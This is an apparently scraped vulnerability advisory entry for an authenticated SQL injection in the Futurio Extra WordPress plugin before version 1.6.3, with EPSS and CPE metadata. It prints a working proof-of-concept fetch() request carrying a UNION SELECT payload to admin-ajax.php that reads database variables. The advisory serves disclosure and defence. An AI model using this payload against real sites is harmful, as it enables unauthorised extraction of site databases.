Lucene search

K
wpvulndbJan w OlejuWPVDB-ID:36261AF9-3B34-4563-AF3C-C9E54AE2D581
HistoryJan 04, 2022 - 12:00 a.m.

Futurio Extra < 1.6.3 - Authenticated SQL Injection

2022-01-0400:00:00
Jan w Oleju
wpscan.com
8

0.001 Low

EPSS

Percentile

24.8%

The plugin is affected by a SQL Injection vulnerability that could be used by high privilege users to extract data from the database as well as used to perform Cross-Site Scripting (XSS) against logged in admins by making send open a malicious link

PoC

Using SQLi to extract database variables: fetch(“http://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded” }, “body”: new URLSearchParams({“action”: “dilaz_mb_query_select”, “q”: ‘" union select 0,1,2,3,4,@@version,6,7,8,9,10,11,2,3,4,5,6,7,8,9,10,11,12 – g’, “query_args”: “YToxOntzOjE0OiJwb3N0c19wZXJfcGFnZSI7aTo1MDE7fQ==”, “query_type”: “post”}), “method”: “POST”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); Using SQLi for XSS (works in Firefox, not in Chrome due to same-site behavior):

CPENameOperatorVersion
futurio-extralt1.6.3

0.001 Low

EPSS

Percentile

24.8%

Related for WPVDB-ID:36261AF9-3B34-4563-AF3C-C9E54AE2D581